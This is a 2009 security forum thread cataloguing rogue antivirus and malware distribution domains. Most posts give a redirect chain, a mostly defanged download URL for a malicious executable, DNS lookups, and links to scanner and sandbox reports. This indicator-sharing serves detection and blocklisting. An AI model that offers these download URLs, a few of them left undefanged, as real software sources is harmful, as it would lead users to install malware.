http://www.malwaredomainlist.com/mdl.php?search=78.46.201&colsearch=All&quantity=50

redirects to:
Code: [Select]
hxxp://check-for-malwarev3.com/download/Antivirus-90ca45c_2015.exe

$ dig check-for-malwarev3.com +short
88.198.107.25
91.212.107.5
91.212.127.200
88.198.120.177
94.102.51.26

http://www.virustotal.com/analisis/e081d27500bb839d337c2a2591b0111adc82fa55aa996d180d7b0989c8d64234-1250782156 3/41

http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=10179225&cs=E150C1F3AEABC0698B526BFF6F8BF873
http://www.threatexpert.com/report.aspx?md5=351ae6a77c4f51b1199f05af9f9faf59
http://anubis.iseclab.org/?action=result&task_id=1d576d2b8b2abbb44d95ee94d900b379c

http://www.malwaredomainlist.com/mdl.php?search=94.102.51&colsearch=All&quantity=50
http://www.malwaredomainlist.com/mdl.php?search=88.198.107&colsearch=All&quantity=50
http://www.malwaredomainlist.com/mdl.php?search=88.198.120&colsearch=All&quantity=50
http://www.malwaredomainlist.com/mdl.php?search=91.212.107&colsearch=All&quantity=50
http://www.malwaredomainlist.com/mdl.php?search=91.212.127&colsearch=All&quantity=50


nothing-to-wear.cn
check-for-malwarev3.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 20, 2009, 08:46:06 pm
Code: [Select]
http://aware-of-future.cn/go.php?id=2009-01&key=cd19f5036&p=1

$ dig aware-of-future.cn +short
78.46.201.89

results in this download:

Code: [Select]
hxxp://safeonlinescannerv4.com/download/Antivirus-1408e3a_2009-1.exe

$ dig safeonlinescannerv4.com +short
88.198.107.25
88.198.120.177
91.212.127.200
91.212.107.5
94.102.51.26

http://www.virustotal.com/analisis/e081d27500bb839d337c2a2591b0111adc82fa55aa996d180d7b0989c8d64234-1250793069 3/41
http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=10179225&cs=E150C1F3AEABC0698B526BFF6F8BF873


aware-of-future.cn
safeonlinescannerv4.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 21, 2009, 03:07:20 pm
Code: [Select]
http://getbestsales.cn/go.php?id=2024-02&key=487c65abf&p=1

$ dig getbestsales.cn +short
78.46.201.89

results in download

Code: [Select]
hxxp://safeonlinescanv4.com/download/Antivirus-fc9e_2024-2.exe

$ dig safeonlinescanv4.com +short
88.198.120.177
94.102.51.26
88.198.107.25
91.212.127.200
91.212.107.5


http://www.virustotal.com/analisis/0aff535025da634992bd27d3189cc31e510f59b541d20c4607d6559ef064b844-1250863949 1/41
http://anubis.iseclab.org/?action=result&task_id=176947d54f621ed1451219a5d70d6d5e6&format=html
http://research.sunbelt-software.com/ViewMalware.aspx?id=10202330&cs=42A7D96E9153260C9092E43270D400BC



getbestsales.cn
safeonlinescanv4.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 25, 2009, 01:47:47 pm
Code: [Select]
hxxp://db-keyz.com/uniblue_registry_booster_2009_new.exe

$ dig db-keyz.com +short
211.95.78.79


http://www.virustotal.com/analisis/6b7fb2e74de4c99cd5b8167e9a9f663f1203844c62d039e9281db63cd4077035-1251205159 13/41
http://www.malwaredomainlist.com/mdl.php?search=211.95.78&colsearch=All&quantity=50


db-keyz.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 25, 2009, 03:16:37 pm
Code: [Select]
hxxp://wheels-on-fire.cn/go.php?id=2007&key=cc50a9ed9&p=1

$ dig wheels-on-fire.cn +short
94.102.48.29

resulted in this download

Code: [Select]
hxxp://antivirus-scannerv12.com/download/Antivirus-420d9_2024-2.exe

$ dig antivirus-scannerv12.com +short
88.198.120.177
91.212.107.5
94.102.51.26
88.198.107.25
91.212.127.200
78.46.251.43

hxxp://getyourantivirusv3.com/download/Antivirus-158154_2007.exe

$ dig getyourantivirusv3.com +short
78.46.251.43
94.102.51.26
91.212.107.5
88.198.107.25
91.212.127.200
88.198.120.177

http://www.virustotal.com/analisis/5e67b8dc97ac617823f34f5d0d9ba46fe2a73c759febc7be61bfefbdab504c60-1251206828 0/41


wheels-on-fire.cn
antivirus-scannerv12.com
getyourantivirusv3.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 25, 2009, 03:58:22 pm
Code: [Select]
hxxp://softwareupdatesv6.com/template.bmp

$ file template.bmp
template.bmp: data

$ dig softwareupdatesv6.com +short
94.102.48.28

http://www.malwaredomainlist.com/mdl.php?search=94.102.48&colsearch=All&quantity=50


softwareupdatesv6.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 26, 2009, 03:01:45 pm
Code: [Select]
hxxp://clean-all-spyware.com/download/Antivirus_34s1.exe

$ dig clean-all-spyware.com +short
88.198.105.149
88.198.233.225

http://www.virustotal.com/analisis/ee63aec1d0c4cc6e4aab81cdccfcf43608965618fce0d15acbc9f088b9cec68c-1251293402 2/41
http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=10287181&cs=6634193D9555278D91A541309DC9C83C
http://anubis.iseclab.org/?action=result&task_id=1e75a7b020e8a3fc4d5b358e641282da1&format=html

http://www.malwaredomainlist.com/mdl.php?search=88.198.105&colsearch=All&quantity=50
http://www.malwaredomainlist.com/mdl.php?search=88.198.233&colsearch=All&quantity=50


clean-all-spyware.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 26, 2009, 08:13:56 pm
Code: [Select]
hxxp://chinafavorites.cn/go.php?id=2007&key=cc50a9ed9&p=1

$ dig chinafavorites.cn +short
94.102.48.29

results in download of

Code: [Select]
hxxp://getyoursecuritynowv2.com/download/Antivirus-8a4a931_2007.exe

$ dig getyoursecuritynowv2.com +short
78.46.251.43
88.198.120.177
94.102.51.26
91.212.127.200
88.198.107.25
91.212.107.5

http://www.virustotal.com/analisis/7162d0f78336fe8087a17df30c74ac4369dca1b38f447f5ef19535ce8838a8f8-1251316028 4/41
http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=10287437&cs=8861108D2BF0DBB78EDB165555550697
http://anubis.iseclab.org/?action=result&task_id=13470eeef70dba974d1cfd4850152389b

http://www.malwaredomainlist.com/mdl.php?search=78.46.251&colsearch=All&quantity=50
http://www.malwaredomainlist.com/mdl.php?search=88.198.107&colsearch=All&quantity=50
http://www.malwaredomainlist.com/mdl.php?search=88.198.120&colsearch=All&quantity=50
http://www.malwaredomainlist.com/mdl.php?search=91.212.107&colsearch=All&quantity=50
http://www.malwaredomainlist.com/mdl.php?search=94.102.51&colsearch=All&quantity=50


chinafavorites.cn
getyoursecuritynowv2.com

Title: Re: Mr Clean's dirt
Post by: sriramp on August 27, 2009, 01:01:10 am
Hi,

Currently, the redirection of this is from here
Code: [Select]
hxxp://chinafavorites.cn/go.php?id=2007&key=cc50a9ed9&p=1
to here
Code: [Select]
http://scanforvirusonlinev3.com/download/Antivirus-420d9_2007.exe
The SHA I got is D1B6F97E7D17950D92BF0A7BBB36023440D4F025

Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 27, 2009, 12:39:31 pm
Code: [Select]
http://bulkdvdreader.cn/go.php?id=2004&key=ff0057594&p=1

$ dig bulkdvdreader.cn +short
94.102.48.29

redirects to

Code: [Select]
hxxp://live-virus-scanner7.com/download/Antivirus-944_2004.exe

$ dig live-virus-scanner7.com +short
91.212.127.200
94.102.51.26
88.198.120.177
88.198.107.25
78.46.251.43
91.212.107.5

http://www.virustotal.com/analisis/8e72b04b24a2987fd72df1b5254a1757f8c667a33c348870d817dbf9babf692e-1251372822 2/41
http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=10296500&cs=7900BB8476E9DEC475BE664DD71E1372


bulkdvdreader.cn
live-virus-scanner7.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 27, 2009, 02:40:23 pm
Code: [Select]
hxxp://winsoftwareupdatesv2.com/Driver.exe

$ dig winsoftwareupdatesv2.com +short
89.47.237.52

http://www.virustotal.com/analisis/d3d69559a03399b547f99c5bc0a021b7f9495b6b931d430e2782bf7d10e1a013-1251353812 11/41
http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=10287457&cs=928496AAB7333D28FDB870E5862B81EB
http://anubis.iseclab.org/?action=result&task_id=17f7438dbeee43d54b5e5e0c0faee0157&call=first

http://www.malwaredomainlist.com/mdl.php?search=89.47.237&colsearch=All&quantity=50


winsoftwareupdatesv2.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 27, 2009, 06:57:34 pm
Code: [Select]
hxxp://wareseekerdownload.com/download35174/setup.exe

$ dig wareseekerdownload.com +short
208.79.201.206

http://www.virustotal.com/analisis/459aafeaa08153fb321dcaedf4e1d4424a553ae1c64c98b10fbfbf4d40667be0-1251393824 7/39
http://anubis.iseclab.org/?action=result&task_id=198805cadba42b8d491b92800c91162dc&format=html
http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=10298791&cs=A6C6C8CB93CF73D1CD2E0EBB633E490C


wareseekerdownload.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 27, 2009, 07:03:57 pm
Code: [Select]
hxxp://remove-pc-spyware.com/download/Antivirus_88s1.exe

$ dig remove-pc-spyware.com +short
88.198.105.149
88.198.233.225


http://www.virustotal.com/analisis/cb0219a0b9c80eab20c28f9383d18dda850c2033748862861bafb67d0289950a-1251386253 1/41
http://anubis.iseclab.org/?action=result&task_id=1f208856ca1b83e34f1575af74caa31ec&format=html
http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=10299076&cs=B733EC35E72097B3D933B51E27B3F947


http://www.malwaredomainlist.com/mdl.php?search=88.198.105&colsearch=All&quantity=50
http://www.malwaredomainlist.com/mdl.php?search=88.198.233&colsearch=All&quantity=50


remove-pc-spyware.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 31, 2009, 12:46:46 pm
Code: [Select]
hxxp://tryantivirusscan.com/download/Antivirus_162.exe

$ dig tryantivirusscan.com +short
193.169.12.70
78.46.201.89

http://www.virustotal.com/analisis/6118fe410e1f8092391962766c5aa1d6c1f8260e038eebccb58d15f19e4504a2-1251721678 1/41
http://research.sunbelt-software.com/ViewMalware.aspx?id=10336371&cs=605A7031F366DC28B4F72870413D0644
http://anubis.iseclab.org/?action=result&task_id=1e81a4f001d9d3d845d7201dba835189a


tryantivirusscan.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 31, 2009, 01:00:31 pm
Code: [Select]
hxxp://best-live-lottery.cn/go.php?id=2006-54&key=0522c7066&p=1

$ dig best-live-lottery.cn +short
94.102.48.29

redirects

Code: [Select]
hxxp://antispyware-scanner2.com/download/Antivirus-fc2_2006-54.exe

$ dig antispyware-scanner2.com +short
91.212.127.200
88.198.107.25
88.198.120.177
78.46.251.43
91.212.107.5
94.102.51.26

http://www.virustotal.com/analisis/848a92b1a3294ea47d3a2b02eff865347c236ef676c09422470a75acf0841824-1251717896 1/41
http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=10336396&cs=4F9BE2685E7224BB43B9A2D2118363D5
http://anubis.iseclab.org/?action=result&task_id=19dd62891540c4fe4c549a6a2b37c449a


best-live-lottery.cn
antispyware-scanner2.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 31, 2009, 05:54:11 pm
Code: [Select]
http://justseethisonline.com/?pid=58s02&sid=9f93bc

$ dig justseethisonline.com +short
193.169.12.70

redirects to

Code: [Select]
hxxp://tryantivir-scanner.com/download/Antivirus_58s2.exe

$ dig tryantivir-scanner.com +short
193.169.12.70
78.46.201.89

http://www.virustotal.com/analisis/6118fe410e1f8092391962766c5aa1d6c1f8260e038eebccb58d15f19e4504a2-1251722575 1/41
http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=10336371&cs=605A7031F366DC28B4F72870413D0644


justseethisonline.com
tryantivir-scanner.com


Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 31, 2009, 06:04:04 pm
Code: [Select]
http://virscan-online1.com/download/Antivirus_162.exe

$ dig virscan-online1.com +short
193.169.12.70
78.46.201.89

http://www.virustotal.com/analisis/6118fe410e1f8092391962766c5aa1d6c1f8260e038eebccb58d15f19e4504a2-1251722575 1/41


virscan-online1.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 31, 2009, 10:37:16 pm
Code: [Select]
hxxp://live-virus-scanner9.com/download/Antivirus-7939d_2004.exe

$ dig live-virus-scanner9.com +short
78.46.251.43
88.198.120.177
88.198.107.25
91.212.127.200
91.212.107.5
94.102.51.26

http://www.virustotal.com/analisis/848a92b1a3294ea47d3a2b02eff865347c236ef676c09422470a75acf0841824-1251756245 4/41
http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=10336396&cs=4F9BE2685E7224BB43B9A2D2118363D5
http://anubis.iseclab.org/?action=result&task_id=1b31396b87c21b9a4958847ce1c0de98a&format=html


live-virus-scanner9.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on September 01, 2009, 01:46:21 am
Code: [Select]
http://antivirus-scanner6.com/download/Antivirus-c517d68_2024-7.exe

$ dig antivirus-scanner6.com +short
78.46.251.43
91.212.127.200
91.212.107.5
88.198.120.177
88.198.107.25
94.102.51.26

http://www.virustotal.com/analisis/848a92b1a3294ea47d3a2b02eff865347c236ef676c09422470a75acf0841824-1251761602 6/41


antivirus-scanner6.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on September 01, 2009, 04:02:33 pm
Code: [Select]
hxxp://antivirus-promo-scan.com/download/Antivirus_162.exe

$ dig antivirus-promo-scan.com +short
193.169.12.70
78.46.201.89

http://www.virustotal.com/analisis/800859dd71fa83164c4524151b002e5cf1814ddd7ee74983984acbbe1cd337c2-1251816883 2/39
http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=10349176&cs=7F86286B7DB9956BA41EE33F90B75DC8


antivirus-promo-scan.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on September 02, 2009, 01:13:27 pm
Code: [Select]
hxxp://tom-hanks.cn/go.php?id=2033-01&key=9562b5cdd&p=1

$ dig tom-hanks.cn +short
83.133.126.155

redirects to

Code: [Select]
hxxp://best-antivirus3.com/download/Antivirus-767_2033-1.exe

$ dig best-antivirus3.com +short
91.212.127.200
94.102.51.26
78.46.251.43
88.198.107.25
88.198.120.177
91.212.107.5

http://www.virustotal.com/analisis/340b8b756888e3a08077845fd4aa7ddd727b64144376efa2fdbf604ada506b14-1251885393 1/40


tom-hanks.cn
best-antivirus3.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on September 03, 2009, 12:37:22 pm
Code: [Select]
hxxp://iwanttowin.cn/go.php?id=2006-56&key=0522c7066&p=1

$ dig iwanttowin.cn +short
94.102.48.29

redirects to

Code: [Select]
hxxp://best-antivirus8.com/download/Antivirus-75ff09_2006-56.exe

$ dig best-antivirus8.com +short
78.46.251.43
94.102.51.26
88.198.107.25
88.198.120.177
91.212.127.200
91.212.107.5

http://www.virustotal.com/analisis/58a074eb39b35ceff79df89700a7e16a235e9a19b2f781aeefef7f51986a458a-1251978513 0/41


iwanttowin.cn
best-antivirus8.com


Title: Re: Mr Clean's dirt
Post by: Mr Clean on September 04, 2009, 11:35:31 am
Code: [Select]
hxxp://winfirewallupdatesv2.com/Driver.exe

$ dig winfirewallupdatesv2.com +short
89.47.237.52

http://www.virustotal.com/analisis/323292d421d5b97940e14833ff305b50a37e415929a3ec5bbbad7fb1c8772afd-1251961196 17/41


winfirewallupdatesv2.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on September 04, 2009, 02:43:42 pm
Code: [Select]
hxxp://best-live-virus-scanner7.com/go.php?id=2009-1480&key=cd19f5036&p=1

$ dig best-live-virus-scanner7.com +short
94.102.48.29

redirects to

Code: [Select]
hxxp://antimalwarescanner8.com/download/Antivirus-4f49_2009-1480.exe

$ dig antimalwarescanner8.com +short
91.212.107.5
91.212.127.200
94.102.51.26
78.46.251.43
88.198.107.25
88.198.120.177

http://www.virustotal.com/analisis/6a761c86645ca3b8b808a80f330ffb315dc5c175089abf7f8ff9ea2ddbbc57b2-1252072393 3/41
http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=10380261&cs=4D540AF96384B93F7B4D60E5528F0E27


best-live-virus-scanner7.com
antimalwarescanner8.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on September 04, 2009, 07:14:57 pm
Code: [Select]
hxxp://redexedirect.com/flash-plugin_update.40039.exe

$ dig redexedirect.com +short
213.239.211.251

http://www.virustotal.com/analisis/e48c426c8b996a6509d28fcd6b0512ced88681faa606c5229484423d5b4a36fd-1252091407 2/41
http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=10386139&cs=D3DD35E87BCE2095A9930B4E5F089ADB
http://anubis.iseclab.org/?action=result&task_id=18c12f053d7ab13e4d5614760e9ebf5e7


redexedirect.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on September 09, 2009, 02:27:12 pm
Code: [Select]
hxxp://batman-comics.cn/go.php?id=2031&key=6c2039a17&p=1

$ dig batman-comics.cn +short
94.102.48.29


hxxp://quick-virus-scanner02.com/download/Scanner-592_2031.exe

$ dig quick-virus-scanner02.com +short
94.102.51.26
88.198.107.25
91.212.107.5
91.212.127.200

http://www.virustotal.com/analisis/521376ae769d46cdbac20e6b10ebaa03e14f4d01a6d3b95524a0675770204783-1252501662 2/41


batman-comics.cn
quick-virus-scanner02.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on September 10, 2009, 01:38:08 pm
Code: [Select]
hxxp://radioheadicon.cn/go.php?id=2006-71&key=0522c7066&p=1

$ dig radioheadicon.cn +short
94.102.48.29

hxxp://antivirusonlinescan03.com/download/Scanner-7939d6_2006-71.exe

$ dig antivirusonlinescan03.com +short
94.102.51.26
88.198.107.25
91.212.107.5


http://www.virustotal.com/analisis/0418ba6eb5bedab239d7e25673fa8a1b0f70021fd5058b0035177642021bb851-1252589740 3/41


radioheadicon.cn
antivirusonlinescan03.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on September 11, 2009, 02:53:01 pm
Code: [Select]
hxxp://shrekmovie.cn/go.php?id=2009-1692&key=cd19f5036&p=1

$ dig shrekmovie.cn +short
94.102.48.29


hxxp://best-spyware-scan03.com/download/Scanner-9139_2009-1692.exe

$ dig best-spyware-scan03.com +short
94.102.51.26
88.198.107.25
91.212.107.5

http://www.virustotal.com/analisis/dffe1a48132a8a87ff9021c269c84faba6c1a5cfb79a3dafa0622898868fb1df-1252680517 2/41
http://anubis.iseclab.org/?action=result&task_id=1f368a2507c6940d4cd769aa95e9136a3


shrekmovie.cn
best-spyware-scan03.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on September 12, 2009, 07:07:47 am
Code: [Select]
hxxp://barada1.cn/cod/video_codec1.56.987_setup.exe

$ dig barada1.cn +short
91.214.45.101

http://www.virustotal.com/analisis/9f34a333be28432cad59126be86f8b5fb4e4a450b832a0e46f5a3ea233345902-1252738931 9/41


barada1.cn

Title: Re: Mr Clean's dirt
Post by: Mr Clean on September 13, 2009, 03:16:29 pm
Code: [Select]
hxxp://softwaresecurityupdate3.com/Driver.exe
$ dig softwaresecurityupdate3.com +short
91.212.127.201

http://www.virustotal.com/analisis/289616c4f65aa326c1907de12af0355de76491730c5aae6abf71585e36a347b5-1252620138 14/41


softwaresecurityupdate3.com


Title: Re: Mr Clean's dirt
Post by: Mr Clean on September 14, 2009, 06:02:38 pm
Code: [Select]
hxxp://www.irs.gov.1kikyt.eu/fraud_application/directory/tax-statement.exe

$ dig www.irs.gov.1kikyt.eu +short

http://www.virustotal.com/analisis/2c0bc33bc07a341a768ab073d7ad96a347f5c80480fee50dec99b4cf37a9992a-1252950255 10/41


1kikyt.eu

Title: Re: Mr Clean's dirt
Post by: Mr Clean on September 15, 2009, 11:48:06 am
Code: [Select]
hxxp://usdisturbed.cn/?pid=118s20&sid=00562f

$ dig usdisturbed.cn +short
193.169.12.70


hxxp://fast-virus-scan4.com/download/Soft_118s20.exe

$ dig fast-virus-scan4.com +short
91.213.126.100
193.169.12.70

http://www.virustotal.com/analisis/f6cd1730ef43e73cfb803e12703c6941a24b5a889af77f55ec66e628a64a5146-1253014558 2/41


usdisturbed.cn
fast-virus-scan4.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on September 15, 2009, 08:13:24 pm
Code: [Select]
hxxp://myth-busters.cn/go.php?id=2009-1506&key=cd19f5036&p=1

$ dig myth-busters.cn +short
94.102.48.29

hxxp://005threats-scanner.com/download/Scanner-81541_2009-1506.exe

$ dig 005threats-scanner.com +short
78.46.201.89
78.46.251.41
88.198.81.153
88.198.120.177
78.46.118.1

http://www.virustotal.com/analisis/d826f7910ee42715a28b640a06ecaa7b61d0e1265665a8441095be24529b32b5-1253039474 2/41


myth-busters.cn
005threats-scanner.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on September 16, 2009, 12:16:23 am
Code: [Select]
hxxp://paulmccartneyusa.cn/?pid=149&sid=46335d

$ dig paulmccartneyusa.cn +short
193.169.12.70


hxxp://delete-all-virus01.com/download/Soft_149.exe

$ dig delete-all-virus01.com +short
193.169.12.70
91.213.126.100

http://www.virustotal.com/analisis/26687a06401fa7baee57b9ee8a352315e3c6e517b2814183d28106ed00859bff-1253059559 3/41


paulmccartneyusa.cn
delete-all-virus01.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on September 16, 2009, 10:26:10 pm
Code: [Select]
hxxp://fallsoftsafety.com/streamviewer.45043.exe

$ dig fallsoftsafety.com +short
64.191.22.150

http://www.virustotal.com/analisis/28234c64f6de05387e4e7757ae85606fa49dc93ac96c50897d00497493768e3e-1253139606 6/41


fallsoftsafety.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on September 17, 2009, 02:58:50 pm
Code: [Select]
hxxp://teacherslounge.cn/go.php?id=2004&key=ff0057594&p=1

$ dig teacherslounge.cn +short
94.102.48.29


hxxp://6malwarescan.com/load/Scaner-be0c5cd_2004-4.exe

$ dig 6malwarescan.com +short
88.198.120.177
78.46.118.2
78.46.201.89
78.46.251.41
88.198.81.153

http://www.virustotal.com/analisis/dc5cd7ab47040323b0f10b69993d8778391f429d67aeb39e7ba036cdf64809e2-1253198389 1/41


teacherslounge.cn
6malwarescan.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on September 17, 2009, 03:07:47 pm
Code: [Select]
hxxp://issuenews1.com/?pid=149&sid=46335d

$ dig issuenews1.com +short
89.248.174.61


hxxp://delete-all-virus05.com/download/Soft_149.exe

$ dig delete-all-virus05.com +short
89.248.174.61
206.217.201.136
78.47.230.33

http://www.virustotal.com/analisis/701d849d1a2500cf20b7229ad08698ee362c9f89365aadb566e921cffcaf3d66-1253196859 3/41



issuenews1.com
delete-all-virus05.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on September 18, 2009, 05:25:50 pm
Code: [Select]
hxxp://cnn-bcc2.com/?pid=71&sid=f3b6e0

$ dig cnn-bcc2.com +short
89.248.174.61

hxxp://antispywaretotalscan0.com/download/Soft_71.exe

$ dig antispywaretotalscan0.com +short
213.163.89.60
89.47.237.55
89.248.174.61

http://www.virustotal.com/analisis/556421211a74a309e865e7f610c5f7a5c067e01d30ddab3833247e9656cae63a-1253290351 2/41


cnn-bcc2.com
antispywaretotalscan0.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on September 21, 2009, 02:42:10 pm
Code: [Select]
hxxp://tohva.org/bestacti0n/

$ dig tohva.org +short
72.167.232.54

http://wepawet.iseclab.org/view.php?hash=871b1490c6b38e09a034642efdfa0641&t=1253543675&type=js

Code: [Select]
hxxp://99.225.203.135/d=tohva.org/0x3E8/view/setup.exe

http://www.virustotal.com/analisis/e1f365423df104c2bdeac819434314fa3c1c3e0dfefbe17cd422b3bc91de9546-1253532605



tohva.org


Title: Re: Mr Clean's dirt
Post by: Mr Clean on September 21, 2009, 02:52:49 pm
Code: [Select]
hxxp://jeremy-kyle-now.cn/go.php?id=2006-71&key=0522c7066&p=1

$ dig jeremy-kyle-now.cn +short
206.217.201.136

hxxp://compurerthreats05.com/load/PersScan-b90b_2006-71.exe

$ dig compurerthreats05.com +short
78.46.118.2
78.46.201.89
78.46.251.41
88.198.81.153
88.198.120.177

http://www.virustotal.com/analisis/63dc178edfd235647ea2d492c331295b7bb70adc4273f2d9a48ada48f2d235ca-1253538847 2/41


jeremy-kyle-now.cn
compurerthreats05.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on September 22, 2009, 02:08:59 pm
Code: [Select]
hxxp://full-house-stuff.cn/go.php?id=2035&key=6165353a7&p=1

$ dig full-house-stuff.cn +short
206.217.201.136

hxxp://compurerthreats4.com/load/PersScan-e3dad99_2035.exe

$ dig compurerthreats4.com +short
88.198.81.153
88.198.120.177
78.46.118.2
78.46.201.89
78.46.251.41

http://www.virustotal.com/analisis/7c49f094bb254b3ab1840425bb15790c38c03425f535bbf146ce6a2bc112d271-1253604724 1/41


full-house-stuff.cn
compurerthreats4.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on September 23, 2009, 06:43:18 pm
Code: [Select]
hxxp://dolce-unt-gabbana.com/?pid=207&sid=de9f8f

$ dig dolce-unt-gabbana.com +short
89.248.174.61

hxxp://mycomputer-scanner1a.com/download/Soft_207.exe

$ dig mycomputer-scanner1a.com +short
206.217.201.240
213.163.89.60
89.47.237.55
89.248.174.61


http://www.virustotal.com/analisis/5cf130273b3ba0916ceae3ddeb38392063f12116c5772b1a219c2d8e7854d078-1253729193 4/41


dolce-unt-gabbana.com
mycomputer-scanner1a.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on September 24, 2009, 01:26:55 pm
Code: [Select]
hxxp://jennifer-hudson-site.com/?pid=118s20&sid=00562f

$ dig jennifer-hudson-site.com +short
89.248.174.61

hxxp://mycompscanner02.com/download/Soft_118s20.exe

$ dig mycompscanner02.com +short
89.47.237.55
89.248.174.61
206.217.201.240
213.163.89.60

http://www.virustotal.com/analisis/cb436af737004b0739b9e24e8a4434edeb454d1d6cdf1dfecd6004cdc7f69dcc-1253797532 2/41


jennifer-hudson-site.com
mycompscanner02.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on September 25, 2009, 06:00:39 pm
Code: [Select]
hxxp://baconguide.cn/go.php?id=2015&key=ace6725ec&p=1

$ dig baconguide.cn +short
206.217.201.136

hxxp://computeron-linescan06.com/load/Alpha-Scan-ff6_2015.exe

$ dig computeron-linescan06.com +short
188.40.61.236
88.198.81.153
91.212.127.202

http://www.virustotal.com/analisis/3d1305ef1b611dad6dba01d9877a753a95b4ec31955988fbe66552e3e877e24f-1253899121 4/41


baconguide.cn
computeron-linescan06.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on September 28, 2009, 04:16:51 pm
Code: [Select]
hxxp://hawthorneheights.cn/go.php?id=2002-08&key=9ba00f58f&p=1

$ dig hawthorneheights.cn +short
78.47.209.65


hxxp://internet-antivirus-scan.com/load/Alpha-Scan-e3dad9_2002-8.exe

$ dig internet-antivirus-scan.com +short
69.4.230.204
83.133.124.44

http://www.virustotal.com/analisis/525dc29f81abed75f22d914599928ccb166ee6fb22dfca2a28d2e8b4dc07c162-1254149651 1/41


hawthorneheights.cn
internet-antivirus-scan.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on September 29, 2009, 12:20:13 pm
Code: [Select]
hxxp://benharpergals.com/?pid=162&sid=c3d08e

$ dig benharpergals.com +short
89.248.174.61

hxxp://mycompscanner42.com/download/Soft_162.exe

$ dig mycompscanner42.com +short
206.217.201.240
213.163.89.60
89.248.174.61

http://www.virustotal.com/analisis/239dcdf0d3583c4df2a7dd46de5bcab821bed9dfeb51ac6f7f31d5037a1009ef-1254226320 2/41


benharpergals.com
mycompscanner42.com


Title: Re: Mr Clean's dirt
Post by: Mr Clean on September 29, 2009, 05:59:00 pm
Code: [Select]
hxxp://www.irs.gov.vdslprot1.com/fraud_application/directory/tax-statement.exe

$ dig www.irs.gov.vdslprot1.com +short

http://www.virustotal.com/analisis/6f1538b95bbaa372eaf78ff3ec6b17505820bda5f1b573393ce0da033fd82717-1254235507 1/41


vdslprot1.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on October 01, 2009, 02:27:00 pm
Code: [Select]
hxxp://www.aghdg.us/setup.exe

$ dig www.aghdg.us +short
98.131.253.58

http://www.virustotal.com/analisis/78e7c936417e8ada7227fd9b6fcb42093ee68b443d873712fa0609ee47eea5d4-1254403628 7/41
http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=10971394&cs=9FC0D446CFFF947467AA836D66BCA8DC



aghdg.us
updateadvanced.org

Title: Re: Mr Clean's dirt
Post by: Mr Clean on October 01, 2009, 03:54:33 pm
Code: [Select]
hxxp://my-garden-state.com/?pid=70&sid=d6a3f1

$ dig my-garden-state.com +short
89.248.174.58

hxxp://pc-scanner16.com/download/Soft_70.exe

$ dig pc-scanner16.com +short
91.212.127.202
213.163.89.60
89.248.174.58

http://www.virustotal.com/analisis/0815bdbb6dec1837b4dba5b822f77739fecac39bdadfe8cd41b71856db7fb9cd-1254408626 3/41


my-garden-state.com
pc-scanner16.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on October 01, 2009, 04:56:16 pm
Code: [Select]
hxxp://www.irs.gov.vsdftpp.mobi/fraud_application/directory/tax-statement.exe

$ dig  www.irs.gov.vsdftpp.mobi +short

http://www.virustotal.com/analisis/04bfba6f6e136b1006fa28f36ca4c40382b6c939e8e83d713e6f1be6f7e7c6c3-1254411591 9/41


vsdftpp.mobi

Title: Re: Mr Clean's dirt
Post by: Mr Clean on October 01, 2009, 09:30:16 pm
Code: [Select]
hxxp://moviemidifiles.net/CartoonPorn-Movies.40054.exe

$ dig moviemidifiles.net +short
66.197.132.22

http://www.virustotal.com/analisis/a6640fd355626f89355dae2bd5d09189353c544646b90ee39c1e9a4533a5b084-1254432146 10/41


moviemidifiles.net

